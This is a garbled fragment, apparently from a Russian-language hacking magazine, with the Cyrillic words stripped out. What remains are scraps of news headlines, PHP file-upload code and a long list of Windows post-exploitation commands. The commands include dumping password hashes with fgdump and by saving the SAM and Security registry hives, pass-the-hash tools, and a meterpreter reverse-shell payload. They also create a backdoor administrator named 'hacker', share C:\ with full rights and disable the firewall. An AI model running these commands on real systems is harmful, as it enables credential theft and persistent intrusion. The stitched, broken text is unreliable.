, THE CONSUMERIST, RIAA .

WEXLER.BOOK E7001. Wexler

ENTENSYS COMMTOUCH , 6,7% .

Lolita City , 100 .

DoS/PoC- ICMP refCount

MAIL.RU GROUP , Twitter. , .

FXI . The Cotton Candy

LINUX 3.1, kernel.org .

GET- POST- XSS-,

000, 00spersky Lab

XML XML ENCRYPTION

Extensible Markup Language ( XML)

Message flow Apache Axis2

Pr0xor (php.m4sql@gmail.com, rdot.org/forum)

$fp = fopen('php://output', 'w');

allow_url_include = Off RFI.

<?php echo 'Hello!!!'; ?>

<form action="upload.php" method="POST"

foreach ($_FILES["file"]["tmp_name"] as $key => $name) {

iOS, iOS ( , iOS Developer

> fgdump.exe -f hostfile.txt -u MYDOMAIN\someuser -T 10

> sudo ./hashgrab2.py

set payload windows/meterpreter/reverse_tcp

WCE Pass-the-Hash Toolkit,

-s user Victim, LM- NTLM-, - , .

John the Ripper

netstat - (TCP, UDP, ICMP, IP).

netstat -na | findstr :445

net user %USERNAME% /domain

net accounts /domain

net localgroup administrators

net localgroup administrators /domain

net config workstation

schtasks /query /fo csv /v >

net start sc query

taskkill [/f] /pid <pid>

fsutil fsinfo drives

TFTP. FTP- tftp.exe

Ntsd server tcp:port=1337 cal.exe

Windows Vista ntsd.exe,

reg save HKLM\Security security.

reg save HKLM\SAM sam.hive

reg add [\\TargetIPaddr\] [RegDomain][ \Key ]

reg export [RegDomain]\[Key]

reg import [FileName ]

reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!]

tree C:\ /f /a > C:\output_of_tree.txt

dir \ /s /b | find /I "search_string"

dir (\) (/s)

wmic baseboard get Manufacturer, Model, Product,

wmic nicconfig get caption, macaddress, ipaddress,

wmic nicconfig where "IPEnabled = 'TRUE' and

wmic os get bootdevice, caption, csname, currenttimezone, installdate, servicepackmajorversion,

wmic product get Caption, InstallDate, Vendor

net user hacker hacker /add

net localgroup administrators /add hacker

net share nothing$=C:\ /grant:hacker,FULL /unlimited

net user username /active:yes /domain

netsh firewall set opmode disable